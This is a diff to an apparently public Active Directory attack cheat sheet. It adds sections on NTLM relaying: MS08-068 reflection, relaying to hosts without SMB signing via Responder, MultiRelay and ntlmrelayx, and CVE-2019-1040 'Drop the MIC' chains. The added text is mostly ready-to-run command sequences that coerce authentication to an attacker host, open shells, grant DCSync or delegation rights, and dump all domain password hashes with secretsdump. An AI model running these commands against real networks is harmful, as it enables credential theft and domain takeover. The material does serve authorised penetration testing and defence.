Hi15358
@@ -23,6 +23,9 @@
|
||||
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
|
||||
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||
* [SMB Signing Disabled](#smb-signing-disabled)
|
||||
* [Drop the MIC](#drop-the-mic)
|
||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||
* [Unconstrained delegation](#unconstrained-delegation)
|
||||
@@ -658,12 +661,93 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||
|
||||
### NTLMv2 hashes relaying
|
||||
|
||||
NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||
|
||||
| Hash | Hashcat | Attack method |
|
||||
|---|---|---|
|
||||
| LM | 3000 | crack/pass the hash |
|
||||
| NTLM/NTHash | 1000 | crack/pass the hash |
|
||||
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
|
||||
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
|
||||
|
||||
#### MS08-068 NTLM reflection
|
||||
|
||||
NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008.
|
||||
|
||||
> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials.
|
||||
|
||||
* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068
|
||||
|
||||
```powershell
|
||||
msf > use exploit/windows/smb/smb_relay
|
||||
msf exploit(smb_relay) > show targets
|
||||
```
|
||||
|
||||
#### SMB Signing Disabled
|
||||
|
||||
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
|
||||
|
||||
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
|
||||
```powershell
|
||||
[Responder Core]
|
||||
; Servers to start
|
||||
...
|
||||
SMB = Off # Turn this off
|
||||
HTTP = Off # Turn this off
|
||||
```
|
||||
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||
4. Wait for a shell
|
||||
4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list.
|
||||
```powershell
|
||||
ntlmrelayx.py -tf targets.txt
|
||||
```
|
||||
5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
|
||||
```powershell
|
||||
$ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
|
||||
[*] Servers started, waiting for connections
|
||||
Type help for list of commands
|
||||
ntlmrelayx> socks
|
||||
Protocol Target Username Port
|
||||
-------- -------------- ------------------------ ----
|
||||
MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433
|
||||
SMB 192.168.48.230 CONTOSO/NORMALUSER1 445
|
||||
MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433
|
||||
|
||||
$ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
|
||||
$ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
|
||||
```
|
||||
|
||||
#### Drop the MIC
|
||||
|
||||
> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP
|
||||
|
||||
Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
|
||||
|
||||
```powershell
|
||||
python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
|
||||
[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth
|
||||
[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected)
|
||||
```
|
||||
|
||||
- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD
|
||||
```powershell
|
||||
TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local <attacker ip/hostname>
|
||||
TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support
|
||||
TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc
|
||||
```
|
||||
|
||||
|
||||
- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server.
|
||||
```powershell
|
||||
# create a new machine account
|
||||
TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support
|
||||
TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6
|
||||
TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME
|
||||
|
||||
# connect using the ticket
|
||||
export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache
|
||||
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
||||
```
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
@@ -1042,4 +1126,7 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
|
||||
* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
|
||||
* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592)
|
||||
* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/)
|
||||
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
|
||||
* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf)
|
||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||
Reference in New Issue
Block a user